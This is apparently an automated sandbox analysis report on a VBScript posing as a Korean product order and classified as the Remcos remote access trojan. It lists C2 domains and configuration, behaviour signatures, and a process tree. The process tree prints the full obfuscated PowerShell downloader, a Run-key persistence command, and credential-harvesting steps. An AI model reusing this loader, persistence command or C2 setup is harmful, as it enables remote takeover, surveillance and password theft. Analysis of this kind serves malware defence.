Overview

overview

10

Static

static

1

globe_prod...00.vbs

windows7-x64

6

globe_prod...00.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 06:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs

  • Size

    34KB

  • MD5

    cb6936ce8eb2ba2d521916070ab46b7c

  • SHA1

    8aa7fe3dca2da0bbbfe85e4373668120b111576e

  • SHA256

    fd3bf69fade10848b46e3d7c17d3fbcfdf66e0a500debaaad3d8a0dd4249d105

  • SHA512

    60be01c49abe96142b94a48d244f771f42198ed845e81b6f79bafd0252942923637d00fa9fde50d08023fd1e4c717d3f7c527f32fdd88c835924a1e773db3d5a

  • SSDEEP

    384:f9xJH9ENwdC0tLm5AJpOwVfHzSHh2/Ry0JZEjDkGxWxS7wUl8TlR:f9xd9ENwdfNZpOWfuh2533EnDH7oTH

Score
10/10
remcoscla$$ycollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Cla$$y

C2

fajkourt38haoustso1.duckdns.org:57484

fajkourt38haoustso1.duckdns.org:57483

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed2.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kabnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibetgtst-B7S9LT

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Transportingly Isogrammes Inconversant Misfiles Sikkativerne #><#Haletudsens Yaoort Minnesota Diskstationens Kitchenwards temporalises #>$Aandrig='Ldreinstitutionerne';function Unpunctuality($windsock){If ($host.DebuggerEnabled) {$Brockish=5} for ($Tenorfljtes18=$Brockish;;$Tenorfljtes18+=6){if(!$windsock[$Tenorfljtes18]) { break }$isiacal+=$windsock[$Tenorfljtes18]}$isiacal}function Tangue($Falkespors){ .($Driverrutiner) ($Falkespors)}$Rosmarinlyngs=Unpunctuality ' Bolin EcthELambsTKomm .SektiW De tE sixtBEre,icCissylIllumIUdlanesprkkn InofT';$Eliminators=Unpunctuality 'DovenMGassioLanguzTangsiHjnelloveralIndu a Trev/';$Forstrkningsbjlke121=Unpunctuality 'MisgeTSeme lasg,rsA bar1Blks 2';$Knne='Menst[OmskrN spaneh.miot Nudi.P edesS.riveBelgnrPiialvJ rnhIHloftC Gyr EVaaseP ,dgrO Pl,siKar oNK oenTSurheMSkattASt eanko,roaAlonegSyndiESlvgaRloxod] nshe:Su.re: F llSHv,rnePlumpCInterUHandsR.vrddILaplnTSteamY OverPAntiqrMismoOForaaTLituao rundCbetafO Pla lRadio=Pr.cu$ ssisFUranoO asserSup rSEpi,aT ,estrunrevKSplurNP radIdemenn wee g DecySKo btbHectajLoamiLOl.efkLejevE ordr1Larid2 Keto1';$Eliminators+=Unpunctuality 'Sdeba5Ninn,.Preci0Vildn Denta(LatinWSymboiceratn,rugedHabitoRailhwTappesSk bs Tur.eN FremTKontr Az go1roset0Kokse. Medg0Suble;W,rbl NoncoW S priUnappn kon 6Coggl4Prodi;Skibs dampsxSibyl6data.4 Indb;Posre Fo,flrKons.vRhino:Skjor1 orpo3 Biog1Antim.Polyn0skaer)Detai Oven GCykeleMikroc EmigkRhetooCochi/Drosk2Sjatt0 Fibr1Image0 Iml,0Menne1K,rto0Ompos1 ofel CrazFOxycai CrearDig ie Tr kfPa enoPastixmodfo/ mike1Romer3Milos1 redn.Kerne0';$pixilated=Unpunctuality 'Doer.UHopsaSHu boESnea,RSm dr- ApriaWastig amareLyrebN Fr sT';$Forbeholdslse=Unpunctuality ' AderhContrtKollitStoppp ortvsRo,bi:Cajol/Panto/Lyo.ygArte aS,vlerSancyhForgeo Un,iucgmkadOl.agjS ikkoStormuHi rnrGennemPl,sg. eplucDay roFedtkmUn fa/ UnabP Paa aDatafrshafttStent1Orion.HistopCelesnTrafig,pape> Udmeh VindtMandetPeni pnicobs Bibr: Krep/Frgeg/SupergFarvaaVariar synthCo umoRenisuFjerld SiskjKvr,boDisesuLaan,rSussomMonodoTil,lnPent e imeo.DiplocHick oM.ninmLabbe/AstroP TyngaInve,r Fir,tFugti1Kol b. Mulsp Dec.nSkelsg';$Prizable=Unpunctuality 'Silkw>';$Driverrutiner=Unpunctuality 'Traf iStudeeMudslx';$Oplysningstids='Pathicism';$Connubially='\Calusa.Saw';Tangue (Unpunctuality 'Sm ds$ AdneG PaaflOverhOCachaBLithoACentrLA rik:Laangs Sys Y evogMVaa ePPatieHimparY,ekldSHit eoGlavedBeas ANonpucInsemt ForbYResurl ,olkIKnevrAAnn,e1Stude4 Morr3 Afpa=Beken$HenvieTengsNRacerVprede:Ver ia iellp ouarp FrakDShellA FormtDo,deaFetog+ Non.$Cussoccir.uoBemgtn Une.n .orsu DyppBAd.enI MoleaArcatlre.leLNeuroy');Tangue (Unpunctuality ' Syns$ClairGsmaaslI.entO subcB EfteAAlbinlFas i: GaddeSilikXMell.iMaskeT ,etjupan,iR ,oldE,urfm=Sprog$ tje fSurr,o PincRBromobAni oE torthRangeo,adpolHamliDtransS Ro kL hillsReubeeD,lop..nholS Ost pSensoLMaks IHustatmaks (Brand$CargoPGlaucRRepreIProgrZsynodALentibHayfoL B doeForba)');Tangue (Unpunctuality $Knne);$Forbeholdslse=$Exiture[0];$Grundversionens=(Unpunctuality 'Uopst$SprttgSammeL OpkrO HoejB BlasAExorclI ent:Fo.bopSm.glRgalvaEFalsks stegsHyphaD behaoOliekmEfter=ArthrnTinglETom,awBibac-FornuOAustrBSkamfJB skreJernbCLindlTLettu ananaSProphYA.draSL nehTUnd reSultaM Whin.Pre e$Mine.rMisveo saarS Ida.mA,teraS.mspRFasa iEpitonEtag.LUdsmuYB bulnFavorgGeo eS');Tangue ($Grundversionens);Tangue (Unpunctuality ' Hde $Trivip ndur PorteTids,s .ritsAnnotdMans oPoniamBunke.SamspHUd oveaktueaMicrodTnd neD smarEskims Wu t[Uddre$,llempChauvi ParkxCac giKapnil .enzaOpgavtImmureWaistdViltr]photo=Kalku$Hel.aESeriol avouiUndermIncooiTrvlen Symma amvrtproteo Autor Esp s');$Harcellerede=Unpunctuality 'Unhon$ ecipFagomrKuld eEmnedshabitsMise dTunenoCountmDagp .SprgtD SlinoNoninwPh,non Pe ulMi seoHisp,aCruc dSpagnFversii egnelWarl e inte(Huske$ProgeFTidsloEventr FipebB syaeBiskoh,ecimoSvartlamalgdUnerrs retulStabesBlodkeShiph, Nona$Fa,tlELordlc ForhtPla,fi orphrKor eiEphrasForen)';$Ectiris=$Symphysodactylia143;Tangue (Unpunctuality 'Devla$wari GMermilMendiO Slimb LaurAAccepL Uspo:plantOchlorOBserehGaffee TaledE eri=Tau.u(Extratsagkye Je,nsNiveltDjaev- ChorPConstACerattPanelHStail Co ha$Udadle ImpicEpoxyT.ysseiG,nbrrSa.daiTaphosFaktu)');while (!$Oohed) {Tangue (Unpunctuality 'Photo$SubnegWachelStrafoModembGnideaU derlUnp,r:SelvhPH,nniyPaasmrEnteroCoggegSkridePodern anjo=Acoma$ChapoSEma.jt Kr,mrRepr acollyfcentrvKodsjr.verpdEndociExpurg BygghUdstae Escod') ;Tangue $Harcellerede;Tangue (Unpunctuality ',ritusApp ltHud laBofl.RTuskitS.als-bowdls FemolAntilEM tonE hattPSwath proro4');Tangue (Unpunctuality 'Millt$ mailgDefinLen osoUnjesBpal rAUlidelIndec:gy naOStudioSceneH Imp ECoaledUphan= Smre( AmbitChamae eavesWebertVapo -forblPSta dAAntivTPresehUphol n hed$GuttiEFarveCLig sTPreguIS,mplrU somiVerbaSUhomo)') ;Tangue (Unpunctuality '.atte$SkewiG Moc LF rstOSurfcb aisAAfmilL Undt:FaxenhBrayiY lacopSpeljn nomooUnschPDecamHRock oleakfBPico,i HjlaAAshamsChrys=,iona$FrdiggonobrLBar,eOKal uB mulaDronklMinst:ForstBGonofEOvervDOrdreeA,trkvpollei L ysL TegmlMontieanstrDDrist1Solec5Ildsl5Dec t+ Valg+ fter%Vigne$Dip oe Fla xSar oI.heloTSolsiuUdbulRNonree Sly .Brit c SpilOSupe uS orhnForhoT') ;$Forbeholdslse=$Exiture[$Hypnophobias]}$Laverestaaende=317883;$Tegneprocedurerne=32929;Tangue (Unpunctuality 'Acrop$ fficgA ebil RuskO DiskbHjernANonmeLStork:RetlifKloriIProcrLSg ngTRi oueQuestr ContEArbalTDetal Tr,en=Under Op,thgNyorieSvolvTForma-B,tnkC SatiOFenn,NServiTHostieBenbuNbagerT Ptil tele$ReinfELapsucFusiotKom ui ZoisRNgenhI.iskaS');Tangue (Unpunctuality ' Romb$ C,ntgBld rlDelraoSiksabsaltuaPaje l omle:,athisFetispVrigoi TilskAutheeTostahGummioHovedlMaliceResee ancho=Excis Anted[ P odS ompyUncols oliet Tu feskruemRepl . ikeC FortoMesornGibbyvT lleeChefrr Incrt Croi] Tilh: R.ag:ByggeFHorserMoniloberoemLa ouBBuk ea awksDerieeHuorn6 atal4Myx sSFisketWhatar B aci Fljtn esiggTautl(Trskr$ apitFMayfii LodglSkudltAn iheAcetar Butte AchitUd.mm)');Tangue (Unpunctuality 'Trett$HomosgThe gL B,deOMolarB Sv pAForstL,chap:Fireop gmeleduelltBeskarBlijvoKej,eLGr duEUnr suCuiramDr.ppmStykgeHypotN Ca is uto2Pern 5Firma3T.aie aflgg=bog i Ka ie[SvigesDe.feyOmopls Mndtt H lde .amfmHe.ti.SkeptT SbeoEIndtgxAdmirTBaand.Hemate LignNLetfoc,reenoS rdiDBrigaiLystsn SammGFulcr] Blom:H.per:nor.eA H.veSUniv,cSuperISvelniLasty. M,thG pproeTransTRungesRe.ertEndurr.emrei budgNUreglgUnqua( Stan$Ens bSseligpIn ucibil ek GentE NonihBi orONondelO.strEM xni)');Tangue (Unpunctuality 'Tu ul$ WhinGNed klHae oophallbB egna olicl Oply: S.ksaLimp RSwingbSta,nE P.tlj StikDKonstSPrepuTPseudI,oopsl UndelLikenAForkeD Tryke esthlC alcSFrs,ee nco=Foru $ CasapUndiseMislyTUppluRHks ko Pa,alTilbreFrowsUTo rcMPlastmMysteeDi.ignTkkenSVapo 2rette5Rigdo3Overs.ZoiatSHk enu xorBOveresAktratRebesRMuseriGeochN laongUnpub(Gothi$ emedlIndu,aGladsVInconEOmadrR Anale .isiSMisprTBikaraThixoA AllueTangeNNedfadO,tfaE Hete,Knbe $Pre,eTD yadE Signg,nderN PhotEGldspP AltdRNoncoosteriCDifflEtissedPreadU Monor TmmeE GrutrVegetnN nene Goba)');Tangue $Arbejdstilladelse;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1884
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Transportingly Isogrammes Inconversant Misfiles Sikkativerne #><#Haletudsens Yaoort Minnesota Diskstationens Kitchenwards temporalises #>$Aandrig='Ldreinstitutionerne';function Unpunctuality($windsock){If ($host.DebuggerEnabled) {$Brockish=5} for ($Tenorfljtes18=$Brockish;;$Tenorfljtes18+=6){if(!$windsock[$Tenorfljtes18]) { break }$isiacal+=$windsock[$Tenorfljtes18]}$isiacal}function Tangue($Falkespors){ .($Driverrutiner) ($Falkespors)}$Rosmarinlyngs=Unpunctuality ' Bolin EcthELambsTKomm .SektiW De tE sixtBEre,icCissylIllumIUdlanesprkkn InofT';$Eliminators=Unpunctuality 'DovenMGassioLanguzTangsiHjnelloveralIndu a Trev/';$Forstrkningsbjlke121=Unpunctuality 'MisgeTSeme lasg,rsA bar1Blks 2';$Knne='Menst[OmskrN spaneh.miot Nudi.P edesS.riveBelgnrPiialvJ rnhIHloftC Gyr EVaaseP ,dgrO Pl,siKar oNK oenTSurheMSkattASt eanko,roaAlonegSyndiESlvgaRloxod] nshe:Su.re: F llSHv,rnePlumpCInterUHandsR.vrddILaplnTSteamY OverPAntiqrMismoOForaaTLituao rundCbetafO Pla lRadio=Pr.cu$ ssisFUranoO asserSup rSEpi,aT ,estrunrevKSplurNP radIdemenn wee g DecySKo btbHectajLoamiLOl.efkLejevE ordr1Larid2 Keto1';$Eliminators+=Unpunctuality 'Sdeba5Ninn,.Preci0Vildn Denta(LatinWSymboiceratn,rugedHabitoRailhwTappesSk bs Tur.eN FremTKontr Az go1roset0Kokse. Medg0Suble;W,rbl NoncoW S priUnappn kon 6Coggl4Prodi;Skibs dampsxSibyl6data.4 Indb;Posre Fo,flrKons.vRhino:Skjor1 orpo3 Biog1Antim.Polyn0skaer)Detai Oven GCykeleMikroc EmigkRhetooCochi/Drosk2Sjatt0 Fibr1Image0 Iml,0Menne1K,rto0Ompos1 ofel CrazFOxycai CrearDig ie Tr kfPa enoPastixmodfo/ mike1Romer3Milos1 redn.Kerne0';$pixilated=Unpunctuality 'Doer.UHopsaSHu boESnea,RSm dr- ApriaWastig amareLyrebN Fr sT';$Forbeholdslse=Unpunctuality ' AderhContrtKollitStoppp ortvsRo,bi:Cajol/Panto/Lyo.ygArte aS,vlerSancyhForgeo Un,iucgmkadOl.agjS ikkoStormuHi rnrGennemPl,sg. eplucDay roFedtkmUn fa/ UnabP Paa aDatafrshafttStent1Orion.HistopCelesnTrafig,pape> Udmeh VindtMandetPeni pnicobs Bibr: Krep/Frgeg/SupergFarvaaVariar synthCo umoRenisuFjerld SiskjKvr,boDisesuLaan,rSussomMonodoTil,lnPent e imeo.DiplocHick oM.ninmLabbe/AstroP TyngaInve,r Fir,tFugti1Kol b. Mulsp Dec.nSkelsg';$Prizable=Unpunctuality 'Silkw>';$Driverrutiner=Unpunctuality 'Traf iStudeeMudslx';$Oplysningstids='Pathicism';$Connubially='\Calusa.Saw';Tangue (Unpunctuality 'Sm ds$ AdneG PaaflOverhOCachaBLithoACentrLA rik:Laangs Sys Y evogMVaa ePPatieHimparY,ekldSHit eoGlavedBeas ANonpucInsemt ForbYResurl ,olkIKnevrAAnn,e1Stude4 Morr3 Afpa=Beken$HenvieTengsNRacerVprede:Ver ia iellp ouarp FrakDShellA FormtDo,deaFetog+ Non.$Cussoccir.uoBemgtn Une.n .orsu DyppBAd.enI MoleaArcatlre.leLNeuroy');Tangue (Unpunctuality ' Syns$ClairGsmaaslI.entO subcB EfteAAlbinlFas i: GaddeSilikXMell.iMaskeT ,etjupan,iR ,oldE,urfm=Sprog$ tje fSurr,o PincRBromobAni oE torthRangeo,adpolHamliDtransS Ro kL hillsReubeeD,lop..nholS Ost pSensoLMaks IHustatmaks (Brand$CargoPGlaucRRepreIProgrZsynodALentibHayfoL B doeForba)');Tangue (Unpunctuality $Knne);$Forbeholdslse=$Exiture[0];$Grundversionens=(Unpunctuality 'Uopst$SprttgSammeL OpkrO HoejB BlasAExorclI ent:Fo.bopSm.glRgalvaEFalsks stegsHyphaD behaoOliekmEfter=ArthrnTinglETom,awBibac-FornuOAustrBSkamfJB skreJernbCLindlTLettu ananaSProphYA.draSL nehTUnd reSultaM Whin.Pre e$Mine.rMisveo saarS Ida.mA,teraS.mspRFasa iEpitonEtag.LUdsmuYB bulnFavorgGeo eS');Tangue ($Grundversionens);Tangue (Unpunctuality ' Hde $Trivip ndur PorteTids,s .ritsAnnotdMans oPoniamBunke.SamspHUd oveaktueaMicrodTnd neD smarEskims Wu t[Uddre$,llempChauvi ParkxCac giKapnil .enzaOpgavtImmureWaistdViltr]photo=Kalku$Hel.aESeriol avouiUndermIncooiTrvlen Symma amvrtproteo Autor Esp s');$Harcellerede=Unpunctuality 'Unhon$ ecipFagomrKuld eEmnedshabitsMise dTunenoCountmDagp .SprgtD SlinoNoninwPh,non Pe ulMi seoHisp,aCruc dSpagnFversii egnelWarl e inte(Huske$ProgeFTidsloEventr FipebB syaeBiskoh,ecimoSvartlamalgdUnerrs retulStabesBlodkeShiph, Nona$Fa,tlELordlc ForhtPla,fi orphrKor eiEphrasForen)';$Ectiris=$Symphysodactylia143;Tangue (Unpunctuality 'Devla$wari GMermilMendiO Slimb LaurAAccepL Uspo:plantOchlorOBserehGaffee TaledE eri=Tau.u(Extratsagkye Je,nsNiveltDjaev- ChorPConstACerattPanelHStail Co ha$Udadle ImpicEpoxyT.ysseiG,nbrrSa.daiTaphosFaktu)');while (!$Oohed) {Tangue (Unpunctuality 'Photo$SubnegWachelStrafoModembGnideaU derlUnp,r:SelvhPH,nniyPaasmrEnteroCoggegSkridePodern anjo=Acoma$ChapoSEma.jt Kr,mrRepr acollyfcentrvKodsjr.verpdEndociExpurg BygghUdstae Escod') ;Tangue $Harcellerede;Tangue (Unpunctuality ',ritusApp ltHud laBofl.RTuskitS.als-bowdls FemolAntilEM tonE hattPSwath proro4');Tangue (Unpunctuality 'Millt$ mailgDefinLen osoUnjesBpal rAUlidelIndec:gy naOStudioSceneH Imp ECoaledUphan= Smre( AmbitChamae eavesWebertVapo -forblPSta dAAntivTPresehUphol n hed$GuttiEFarveCLig sTPreguIS,mplrU somiVerbaSUhomo)') ;Tangue (Unpunctuality '.atte$SkewiG Moc LF rstOSurfcb aisAAfmilL Undt:FaxenhBrayiY lacopSpeljn nomooUnschPDecamHRock oleakfBPico,i HjlaAAshamsChrys=,iona$FrdiggonobrLBar,eOKal uB mulaDronklMinst:ForstBGonofEOvervDOrdreeA,trkvpollei L ysL TegmlMontieanstrDDrist1Solec5Ildsl5Dec t+ Valg+ fter%Vigne$Dip oe Fla xSar oI.heloTSolsiuUdbulRNonree Sly .Brit c SpilOSupe uS orhnForhoT') ;$Forbeholdslse=$Exiture[$Hypnophobias]}$Laverestaaende=317883;$Tegneprocedurerne=32929;Tangue (Unpunctuality 'Acrop$ fficgA ebil RuskO DiskbHjernANonmeLStork:RetlifKloriIProcrLSg ngTRi oueQuestr ContEArbalTDetal Tr,en=Under Op,thgNyorieSvolvTForma-B,tnkC SatiOFenn,NServiTHostieBenbuNbagerT Ptil tele$ReinfELapsucFusiotKom ui ZoisRNgenhI.iskaS');Tangue (Unpunctuality ' Romb$ C,ntgBld rlDelraoSiksabsaltuaPaje l omle:,athisFetispVrigoi TilskAutheeTostahGummioHovedlMaliceResee ancho=Excis Anted[ P odS ompyUncols oliet Tu feskruemRepl . ikeC FortoMesornGibbyvT lleeChefrr Incrt Croi] Tilh: R.ag:ByggeFHorserMoniloberoemLa ouBBuk ea awksDerieeHuorn6 atal4Myx sSFisketWhatar B aci Fljtn esiggTautl(Trskr$ apitFMayfii LodglSkudltAn iheAcetar Butte AchitUd.mm)');Tangue (Unpunctuality 'Trett$HomosgThe gL B,deOMolarB Sv pAForstL,chap:Fireop gmeleduelltBeskarBlijvoKej,eLGr duEUnr suCuiramDr.ppmStykgeHypotN Ca is uto2Pern 5Firma3T.aie aflgg=bog i Ka ie[SvigesDe.feyOmopls Mndtt H lde .amfmHe.ti.SkeptT SbeoEIndtgxAdmirTBaand.Hemate LignNLetfoc,reenoS rdiDBrigaiLystsn SammGFulcr] Blom:H.per:nor.eA H.veSUniv,cSuperISvelniLasty. M,thG pproeTransTRungesRe.ertEndurr.emrei budgNUreglgUnqua( Stan$Ens bSseligpIn ucibil ek GentE NonihBi orONondelO.strEM xni)');Tangue (Unpunctuality 'Tu ul$ WhinGNed klHae oophallbB egna olicl Oply: S.ksaLimp RSwingbSta,nE P.tlj StikDKonstSPrepuTPseudI,oopsl UndelLikenAForkeD Tryke esthlC alcSFrs,ee nco=Foru $ CasapUndiseMislyTUppluRHks ko Pa,alTilbreFrowsUTo rcMPlastmMysteeDi.ignTkkenSVapo 2rette5Rigdo3Overs.ZoiatSHk enu xorBOveresAktratRebesRMuseriGeochN laongUnpub(Gothi$ emedlIndu,aGladsVInconEOmadrR Anale .isiSMisprTBikaraThixoA AllueTangeNNedfadO,tfaE Hete,Knbe $Pre,eTD yadE Signg,nderN PhotEGldspP AltdRNoncoosteriCDifflEtissedPreadU Monor TmmeE GrutrVegetnN nene Goba)');Tangue $Arbejdstilladelse;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5092
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mitvoth" /t REG_EXPAND_SZ /d "%Odalman% -windowstyle 1 $Voodooistic=(gp -Path 'HKCU:\Software\Rich\').Caracas;%Odalman% ($Voodooistic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mitvoth" /t REG_EXPAND_SZ /d "%Odalman% -windowstyle 1 $Voodooistic=(gp -Path 'HKCU:\Software\Rich\').Caracas;%Odalman% ($Voodooistic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4312
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvwoajcvdgefwdm"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5060
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nxcgbbnozpwkyjapooe"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:4932
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xrhrbuyqnxopjpxtxzzzvb"
        3⤵
          PID:2876
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xrhrbuyqnxopjpxtxzzzvb"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4336

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d34112a7b4df3c9e30ace966437c5e40

      SHA1

      ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

      SHA256

      cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

      SHA512

      49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cbuf0lh.cnk.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\cvwoajcvdgefwdm
      Filesize

      4KB

      MD5

      ac300aeaf27709e2067788fdd4624843

      SHA1

      e98edd4615d35de96e30f1a0e13c05b42ee7eb7b

      SHA256

      d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9

      SHA512

      09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Calusa.Saw
      Filesize

      456KB

      MD5

      c6343dd856d5bfdbf953bf705045ad58

      SHA1

      d01e82e1069b9151c914ab1e0323a1b39f705aa9

      SHA256

      1cc0540ee451605d0ea7d5f5bb1d1d9869cacc45e10a4fdfdc77511dffc36dd0

      SHA512

      481c699bf9bf17297691edf1ca60ac6b54d3166e34c82d9f656b4b1abd9c03766a9270c556385fc8d7700c834549443b546e1abc5d3e716d222c1edd42686120

      Download Submit

    • memory/1884-3-0x0000029EFE570000-0x0000029EFE592000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1884-11-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1884-12-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1884-15-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1884-18-0x00007FFDC0730000-0x00007FFDC11F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1884-0-0x00007FFDC0733000-0x00007FFDC0735000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2908-75-0x00000000207D0000-0x00000000207E9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/2908-72-0x00000000207D0000-0x00000000207E9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/2908-50-0x0000000000C20000-0x0000000001E74000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/2908-76-0x00000000207D0000-0x00000000207E9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/4336-63-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4336-64-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4336-65-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4932-56-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4932-58-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/4932-62-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/5060-61-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/5060-57-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/5060-60-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/5060-55-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/5092-21-0x0000000005D70000-0x0000000005D92000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5092-43-0x0000000009050000-0x000000000B724000-memory.dmp

      Filesize

      38.8MB

      Download

